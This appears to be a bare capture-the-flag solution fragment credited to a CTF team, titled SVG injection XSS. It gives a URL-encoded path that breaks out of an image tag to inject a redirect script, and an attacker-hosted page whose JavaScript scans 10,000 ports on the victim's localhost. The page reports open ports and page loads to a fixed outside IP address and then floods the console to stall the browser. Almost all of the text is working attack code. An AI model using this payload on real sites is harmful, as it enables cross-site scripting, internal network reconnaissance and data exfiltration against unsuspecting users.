Author:Nu1L Team
dngs2010
svg注入 xss
ET /img/88888888"><%2fimage>
<script>window.location='http:%2f%2f172.35.13.164:8000%2ffuck2.html';<%2fscript>
<image%20fuck=".png
<body>
<script>
const scan = (ip, port) => {
let s = document.createElement("script");
s.src = "http://" + ip + ":" + port;
s.onload = () => {
if(port != 3000){
fetch("<http://172.35.13.164:8000/?p=>" + port)
for(let i = 0; i < 300000; i++) {
console.log("fuck!!!!");
}
}
};
document.getElementsByTagName('body')[0].appendChild(s);
};
let p = Array.from({length: 10000}, (a, i) => i + 40000);
port = p;
let i = 0;
while(i != p.length){
scan("127.0.0.1", port[i]);
i = i + 1;
}
window.onload = () => {
fetch("<http://172.35.13.164:8000/?windowonload>");
};
</script>
</body>